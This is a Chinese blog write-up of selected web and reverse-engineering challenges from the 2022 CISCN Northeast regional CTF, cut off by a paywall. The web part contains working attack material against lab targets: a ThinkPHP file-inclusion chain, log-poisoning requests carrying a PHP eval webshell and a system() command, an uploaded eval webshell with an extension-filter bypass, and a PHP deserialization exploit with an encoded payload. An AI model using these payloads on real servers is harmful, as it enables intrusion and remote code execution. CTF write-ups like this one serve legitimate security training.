2022 ciscn 东北赛区分区赛 部分 wp

最新推荐文章于 2024-05-15 07:16:20 发布
VIP文章 最新推荐文章于 2024-05-15 07:16:20 发布
阅读量4.8k 收藏 3
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23321269/article/details/125357495
版权

WEB:

eztp1

给源码了 thinkphp3.2.3,index路由有个 textBox方法,简单的设置参数和渲染,
在这里插入图片描述

3.2.3 有个文件包含,关键点就是File.class.php 里的变量覆盖,但是这边assign方法的第一个参数定死了,所以这里其实没办法覆盖filename

在这里插入图片描述

上边有个parse_str函数去解析post.query 变量覆盖,继续往下看$this->display(T("Home@default/list"));这里去渲染了list.html,调用 W方法,重点应该在这parse_str函数和W方法
在这里插入图片描述
看渲染成功生产的php页面,这里调用 W方法并且传入的 参数param是可控的
在这里插入图片描述
在这里插入图片描述

一路跟进到R方法,这里去调用call_user_func_array
在这里插入图片描述
可以看到函数名是定死的Home\Widget\queryWidget 但是参数可控param(就是我们传入的query) 通过$this->assign("array",$array);赋值给了array
继续跟queryWidget 这里把array数组里的 name、tag、id 作为参数调用B方法。
在这里插入图片描述B方法里直接调用\Think\Hook::exec ,注意这里跟的时候必须得传nameid参数 query=name%253d1%2526id%3d1%2526tag%3d1,不然不会进入if
在这里插入图片描述

到这里直接下一步,可以看到exec方法里可以执行任意类的任意方法并且参数可控,唯一的限制就是只能有一个参数。
在这里插入图片描述

这里直接用那个文件包含漏洞File.class.php 里的file.load,可以任意文件包含,直接读文件试试
query=name%253d\Think\Storage\Driver\File%2526id%3d/etc/passwd%2526tag%3dload
在这里插入图片描述读成功了
但是在题目环境里没有找到flag,利用包含日志文件getshell
构造报错,注意要用bp发,浏览器会自动编码。

GET /index.php?m=--><?=eval($_GET['cmd']);?> HTTP/1.1
Host: 172.16.30.172:58002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述
接着包含日志文件就行了

POST /?m=Home&c=Index&a=textBox&cmd=system('cat+/Secret_is_h3re'); HTTP/1.1
Host: 172.16.30.172:58002
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 110
Content-Type: application/x-www-form-urlencoded

query=name%253d\Think\Storage\Driver\File%2526id%3dApplication/Runtime/Logs/Common/22_06_18.log%2526tag%3dload

在这里插入图片描述

Identity2:

打开题目,根据提示发送请求包,抓取响应包:
在这里插入图片描述

GuessWhatThis1sY0urIdentity再次提交得到文件上传地址h1dden_p4ge.php
在这里插入图片描述

经过一系列测试能够得到以下结论:

  • <? 被过滤
  • 后缀名会被截取,再次拼接到文件名中
  • 中间件版本Apache/2.4.7
    因此使用木马如下
    <script language="pHp">@eval($_POST['sb'])</script>
    后缀会被拼接,大小写能够绕过,只要是php结尾,拼接无所谓呀
    因此构建文件名:
    Husins.jpg.Php
    上传之后访问,连接蚁剑
    在这里插入图片描述
    拿到flag

ezssti:

直接tplmap 一把梭,嗦就完事了
在这里插入图片描述

ezser3:

反序列化链
B __destruct >A __get=>A __get=>A __call=>C getFlag
设置$this->functionsarray("_name"=>array(new C(),'getFlag'))这样调用 call_user_func_array($this->functions[$name],$arg) 时相当于调用 call_user_func_array(array("_name"=>array(new C(),'getFlag')),$arg)
但是这里A类的wakeup方法会制空,需要绕过__wakeup方法,通过回包可以看到PHP版本为8,这样就没办法用修改大小的方法绕过了。

public function __wakeup(){
   
    echo "serA";
    $this->functions = [];
}

利用 R:2;元素。它的意思是“引用第二个值”, 作用相当于是指针。

$a = ["foo"];
$a[1] =& $a[0];

a:2:{
   i:0;s:3:"foo";i:1;R:2;}

这里相当于a数组的第二个参数引用整个序列化数组的第二个值也就是foo,或者也可以直接引用变量,这样当变量改变时,引用他的值也会随之改变。回到题目B类的wakeup函数有个赋值操作。
$this->a = $this->b;
如果B类的__wakeup反序列化时调用在A类的__wakeup之后,我们将
A$this->functions 引用为$a 再设置$b 为array("_name"=>array(new C(),'getFlag')) 这样就可以在$this->functions制空之后,在重新赋值。这样就相当于绕过了A类的__wakeup
在这里插入图片描述
本地测试一下调用顺序,可以看到B类的
在这里插入图片描述在这里插入图片描述
反序列化时调用顺序没问题构造payload

<?php
error_reporting(0);
class A{
   
    private $functions=9999;


    public function __wakeup(){
   
        echo "serA";
        $this->functions = [];
    }
    public function __call($name,$arg){
   
        call_user_func_array($this->functions[$name],$arg);
    }
    public function __get($name){
   
        $this->__call($name,[]);
    }
}
class B{
   
    private $a;
    private $b;
    public $c;
    public function __construct()
    {
   
        $this->b=array("_name"=>array(new C(),'getFlag'));
    }

    public function __destruct(){
   
        $this->b=array("_name"=>array(new C(),'getFlag'));
        echo "serB1";
        echo $this->c->_name;
    }
    public function __wakeup(){
   
        echo "serB2";
        $this->a = $this->b;
    }
}
class C{
   
    public function getFlag(){
   
        echo file_get_contents("/etc/passwd");
    }
}

$a1 = new B();
$a2 = new A();
$a1->c = $a2;
echo serialize($a1);
echo urlencode(serialize($a1));
echo urlencode(str_replace("i:9999","R:2",serialize($a1)));

因为有私有参数,所以得url编码一下
Payload

O%3A1%3A%22B%22%3A3%3A%7Bs%3A4%3A%22%00B%00a%22%3BN%3Bs%3A4%3A%22%00B%00b%22%3Ba%3A1%3A%7Bs%3A5%3A%22_name%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A1%3A%22C%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7Ds%3A1%3A%22c%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A12%3A%22%00A%00functions%22%3BR%3A2%3B%7D%7D

RE

easycpp1:

逆向得出加密算法如下

flag = 'flag{12345678876543211234567887654321}'

flag_c = []

f = []

for i in range(38):

    flag_c.append(ord(flag[i]))

print flag_c


for i in range(35):

    flag_c[i] = flag_c[i]^flag_c[i+1]

    flag_c[i+1] = flag_c[i+1]^flag_c[i+2]

    flag_c[i+2] = flag_c[i+2]^flag_c[i+3]



for i in range(38):

    f.append(hex(flag_c[i]))


print f

print len(f)

写出解密算法

cipher = [0x0A, 0x0B, 0x7D, 0x2F, 0x7F, 0x67, 0x65, 0x30, 0x63, 0x60, 0x37, 0x3F, 0x3C, 0x3F, 0x33, 0x3A,0x3C, 0x3B, 0x35, 0x3C, 0x3E, 0x6C, 0x64, 0x31, 0x64, 0x6C, 0x3B, 0x68, 0x61, 0x62, 0x65, 0x36,0x33, 0x60, 0x62, 0x36, 0x1C, 0x7D]

f = ''

cipher = cipher[::-1]



flag = ''

for i in range(35):

    cipher[i+1] = (cipher[i]^cipher[i+1])

    cipher[i+2] = (cipher[i+1]^cipher[i+2])

    cipher[i+3] = (cipher[i+2]^cipher[i+3])



cipher = cipher[::-1]



for x in range(38):

    flag += chr(cipher[x])

print flag

hana3:

IDA打开发现段名称为vmp,仔细检查发现实际加壳为upx,只是将段名进行了修改。把段名改回为UPX,使用upx -d可以将壳脱下。
静态审计发现并未找到报错信息Wrong,直接使用动态调试断在输入处,通过查找栈回溯可以找到关键逻辑处理的地方。
在这里插入图片描述

向下可以找到check处。
在这里插入图片描述

输入测试数据格式为flag{},通过观察输入测试数据加密过后的密文和flag的密文,猜测为xor运算,反查直接得到key,这样可以省去逆向的过程。使用exp直接解密验证。

cip = [0x56,0xEC,0xA0,0xDC,0x57,0x06,0xFE,0xA3,0xEB,0x72,0xEA,0x97,0xE2,0x87,0x03,0xAA,0x18,0x6A,0xF3,0xBE,0xBD,0xDA,0x79,0x0A,0x98,0x36,0x12,0x5C,0xE0,0x94,0x61,0x5A, 0x42,0xBC,0x4B,0x01,0x49,0x7B,0x5F]

flag = 'flag{12345678876543211234567887654321}'

cip2 = [0x56,0xEC,0xA0,0xDC,0x57,0x07,0xF4,0xA3,0xE9,0x77,0xBF,0x93,0xBC,0x86,0x52,0xA5,0x14,0x6A,0xA5,0xBD,0xB5,0xD2,0x7F,0x0B,0x9B,0x67,0x1D,0x08,0xEF,0xC9,0x32,0x5D,0x43,0xED,0x1E,0x01,0x4B,0x7B,0x01]



flag2 = ''

key = []



for i in range(len(flag)):

    key.append(ord(flag[i])^cip[i])



print key

for i in range(len(key)):

    flag2 += chr(key[i]^cip2[i])

print flag2

Crackme1

这题利用jadx-gui打开
在这里插入图片描述
查看发现密文是每4位进行一个md5加密 分开解密即可
在这里插入图片描述

happymath

使用ida打开,通过Wrong字符交叉引用找到主要部分
首先限制了输入范围97-102或者48-57
在这里插入图片描述
在这里插入图片描述
调整v4、v7爆破即可

#include <iostream>
#include <cstdio>
#include <cstring>
using namespace std;
int main()
{
   
	unsigned int dword_140024630[] = {
   0x00000000, 0xF26B8303, 0xE13B70F7, 0x1350F3F4, 0xC79A971F, 0x35F1141C, 0x26A1E7E8, 0xD4CA64EB, 0x8AD958CF, 0x78B2DBCC, 0x6BE22838, 0x9989AB3B, 0x4D43CFD0, 0xBF284CD3, 0xAC78BF27, 0x5E133C24, 0x105EC76F, 0xE235446C, 0xF165B798, 0x030E349B, 0xD7C45070, 0x25AFD373, 0x36FF2087, 0xC494A384, 0x9A879FA0, 0x68EC1CA3, 0x7BBCEF57, 0x89D76C54, 0x5D1D08BF, 0xAF768BBC, 0xBC267848, 0x4E4DFB4B, 0x20BD8EDE, 0xD2D60DDD, 0xC186FE29, 0x33ED7D2A, 0xE72719C1, 0x154C9AC2, 0x061C6936, 0xF477EA35, 0xAA64D611, 0x580F5512, 0x4B5FA6E6, 0xB93425E5, 0x6DFE410E, 0x9F95C20D, 0x8CC531F9, 0x7EAEB2FA, 0x30E349B1, 0xC288CAB2, 0xD1D83946, 0x23B3BA45, 0xF779DEAE, 0x05125DAD, 0x1642AE59, 0xE4292D5A, 0xBA3A117E, 0x4851927D, 0x5B016189, 0xA96AE28A, 0x7DA08661, 0x8FCB0562, 0x9C9BF696, 0x6EF07595, 0x417B1DBC, 0xB3109EBF, 0xA0406D4B, 0x522BEE48, 0x86E18AA3, 0x748A09A0, 0x67DAFA54, 0x95B17957, 0xCBA24573, 0x39C9C670, 0x2A993584, 0xD8F2B687, 0x0C38D26C, 0xFE53516F, 0xED03A29B, 0x1F682198, 0x5125DAD3, 0xA34E59D0, 0xB01EAA24, 0x42752927, 0x96BF4DCC, 0x64D4CECF, 0x77843D3B, 0x85EFBE38, 0xDBFC821C, 0x2997011F, 0x3AC7F2EB, 0xC8AC71E8, 0x1C661503, 0xEE0D9600, 0xFD5D65F4, 0x0F36E6F7, 0x61C69362, 0x93AD1061, 0x80FDE395, 0x72966096, 0xA65C047D, 0x5437877E, 0x4767748A, 0xB50CF789, 0xEB1FCBAD, 0x197448AE, 0x0A24BB5A, 0xF84F3859, 0x2C855CB2, 0xDEEEDFB1, 0xCDBE2C45, 0x3FD5AF46, 0x7198540D, 0x83F3D70E, 0x90A324FA, 0x62C8A7F9, 0xB602C312, 0x44694011, 0x5739B3E5, 0xA55230E6, 0xFB410CC2, 0x092A8FC1, 0x1A7A7C35, 0xE811FF36, 0x3CDB9BDD, 0xCEB018DE, 0xDDE0EB2A, 0x2F8B6829, 0x82F63B78, 0x709DB87B, 0x63CD4B8F, 0x91A6C88C, 0x456CAC67, 0xB7072F64, 0xA457DC90, 0x563C5F93, 0x082F63B7, 0xFA44E0B4, 0xE9141340, 0x1B7F9043, 0xCFB5F4A8, 0x3DDE77AB, 0x2E8E845F, 0xDCE5075C, 0x92A8FC17, 0x60C37F14, 0x73938CE0, 0x81F80FE3, 0x55326B08, 0xA759E80B, 0xB4091BFF, 0x466298FC, 0x1871A4D8, 0xEA1A27DB, 0xF94AD42F, 0x0B21572C, 0xDFEB33C7, 0x2D80B0C4, 0x3ED04330, 0xCCBBC033, 0xA24BB5A6, 0x502036A5, 0x4370C551, 0xB11B4652, 0x65D122B9, 0x97BAA1BA, 0x84EA524E, 0x7681D14D, 0x2892ED69, 0xDAF96E6A, 0xC9A99D9E, 0x3BC21E9D, 0xEF087A76, 0x1D63F975, 0x0E330A81, 0xFC588982, 0xB21572C9, 0x407EF1CA, 0x532E023E, 0xA145813D, 0x758FE5D6, 0x87E466D5, 0x94B49521, 0x66DF1622, 0x38CC2A06, 0xCAA7A905, 0xD9F75AF1, 0x2B9CD9F2, 0xFF56BD19, 0x0D3D3E1A, 0x1E6DCDEE, 0xEC064EED, 0xC38D26C4, 0x31E6A5C7, 0x22B65633, 0xD0DDD530, 0x0417B1DB, 0xF67C32D8, 0xE52CC12C, 0x1747422F, 0x49547E0B, 0xBB3FFD08, 0xA86F0EFC, 0x5A048DFF, 0x8ECEE914, 0x7CA56A17, 0x6FF599E3, 0x9D9E1AE0, 0xD3D3E1AB, 0x21B862A8, 0x32E8915C, 0xC083125F, 0x144976B4, 0xE622F5B7, 0xF5720643, 0x07198540, 0x590AB964, 0xAB613A67, 0xB831C993, 0x4A5A4A90, 0x9E902E7B, 0x6CFBAD78, 0x7FAB5E8C, 0x8DC0DD8F, 0xE330A81A, 0x115B2B19, 0x020BD8ED, 0xF0605BEE, 0x24AA3F05, 0xD6C1BC06, 0xC5914FF2, 0x37FACCF1, 0x69E9F0D5, 0x9B8273D6, 0x88D28022, 0x7AB90321, 0xAE7367CA, 0x5C18E4C9, 0x4F48173D, 0xBD23943E, 0xF36E6F75, 0x0105EC76, 0x12551F82, 0xE03E9C81, 0x34F4F86A, 0xC69F7B69, 0xD5CF889D, 0x27A40B9E, 0x
最低0.47元/天 解锁文章
Husins
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
2022CISCN部分wp misc pwn
qq_42951211的博客
06-03 784
2022CISCN部分wp
2018CISCN_SOUTH:2018CISCN华南赛区WEB备份
05-13
2018CISCN_SOUTH 2018CISCN华南赛区WEB备份
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1470
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
ciscn 2022东北分区赛pwn bigduck
z1r0的博客
07-01 672
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
CISCN2022东北赛区复赛Writeup-MapleLeaves
Do1phln的博客
06-19 2945
Do1phln b477ery sfc9982 0HB密文中字母跨度在 G-K 间,不禁让人想往 A-F 平移,平移后即为且全部为可打印 ASCII 文本。 拖入本地离线 CyberChef 中先使用Base32,再使用Base85 IP method 解密得到 flag分析音频,无有效信息。加之题目体制侧重于文件方向,使用 010 Editor 打开音频文件,在尾部发现类似 Base64 的文本信息,经过两次解密后得到某个东西的密码。 初步考虑文件内含压缩包或者音频存在隐写信息。经多个工具尝试过后发现
ciscn-2022 东北赛区分区赛 RE-hana
qq_34010404的博客
07-20 494
逆向太菜了,当时没逆出来,今天复现一下,虽然出了,但是是下断点断出来的…
[CISCN 2022 东北]听说这是一个二维码
qq_47875210的博客
12-03 646
复现过程如下: 得到密码:Sound from deep --> ,想到工具,拖到工具中,提示输入密码,密码为0和255,可以代表0或者1,所以写个代码,提取一下所有的ip,然后得到二进制字符串 运行后,得到,现在是2进制转图片了,这一步毕竟简单,实现代码如下: 运行效果: 可以看到这两个,比较像,使用在线网站:戳我打开!flag{c736863427be5671102c039d43f0c75b}
2022CISCN东北复现
qq_52988816的博客
08-04 688
stegsolve查看发现lsb隐写,红蓝绿通道有加密字符串,这里用seteg一把梭应该也可以感觉像base64,解码pi ka chu解码。
[CISCN 2022 东北]Conversion writeup by 王八七七
weixin_52365980的博客
06-08 195
1.打开txt文件很像16进制字符串,但是16进制字符串为A-F所以考虑到将字母进行顺序移位,脚本如下。2.将字符串放入脚本得到移位后的字符串,并将转换后的字符串放入winhe中得到base64字符。3.将base64字符串进行base32解码得到密文。4.再将字符串进行base85解密得到flag。
2010年ACM福州赛区网络赛题目
10-11
2010年ACM亚洲区预选赛福州赛区网络赛题目
2021年西门子杯电梯比赛 东北赛区一等奖 3部10层程序
10-05
2021西门子杯电梯比赛东北赛区一等奖 3部10
ACM-ICPC 2009 武汉赛区网络赛题目
12-03
ACM-ICPC 2009 武汉赛区网络赛题目,希望对大家有用哈
ISCC2022题目附件
06-06
信息安全与对抗技术竞赛(ISCC:Information Security and Countermeasures Contest),于2004年首次举办(国内第一),2022年大学生竞赛为第19届,中小学生信息安全对抗赛为第11届,河南赛区为第10届,广西赛区为第...
CISCN分区赛东北部分wp
Htt9999的博客
06-27 664
东北分区赛部分wp
ciscn 2022东北分区赛pwn blue
z1r0的博客
07-02 703
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 8268
2023全国大学生信息安全竞赛(ciscn)部分题解
Android Factory Images for Nexus Devices
热门推荐
Yaphet
07-17 1万+
连接Nexus设备此页包含允许您恢复您的连接设备的原始工厂固件的二进制图像文件。您将发现这些文件是有用的,如果你使用了安卓开源项目,闪过自定义建立在您的设备上,并希望将该设备返回到其出厂状态。 这些文件是用你个人的Nexus设备不得拆卸、反编译、反向工程、修改或重新分配你的或以任何方式使用,除特别规定的许可条款来与您的装置。 条款及条件 重要:安装此工厂图像将擦除设备上的所有数据。虽然有可能恢
ciscn2021东北赛区分区赛
kingdring的博客
06-15 621
ciscn2021东北赛区分区赛 ++Spirit k1ling 感谢Dazz1e大佬陪我看了很久hh summary 3720pt,rank11 晋级名单还没出,不过大概率是前10进,正好卡掉了,就差一步到罗马,真的意难平… 但是想想自己菜成这样全靠gs带也就释然了一些 这东西就跟S赛一样,今年没了你就要咽下所有的不甘,然后更加努力,等着明年杀回来 ++Spirit绝不会止步于此 今年进第二轮之后改了个名,k某人想去ciscn决赛,去决赛之前不改名,不管哪年,flag立这了。 misc 签到 工具
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 133
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[ciscn2019 华北赛区 day1 web1]dropbox
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的用户名和密码,但是都无法登录成功。因此,我们需要通过其他方式来获取flag。 我们可以尝试一些常见的Web漏洞,比如SQL注入、XSS等。在这个题目中,我们可以尝试一些文件上传漏洞。 我们可以通过Burp Suite等工具,来拦截网站的上传请求,然后修改上传的文件,来获取flag。 具体的操作步骤如下: 1. 使用Burp Suite等工具,拦截上传请求。 2. 修改上传的文件,将文件名改为flag.php。 3. 将上传的文件类型改为php。 4. 将上传的文件内容改为以下内容: <?php echo "flag{xxxxxxxxxxxxxxxxxxxx}"; ?> 其中,xxxxxxxxxxxxxxxxxxxx为flag的具体内容。 5. 发送修改后的上传请求,上传文件。 6. 访问上传的文件,即可获取flag。 通过以上步骤,我们就可以成功获取到flag了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值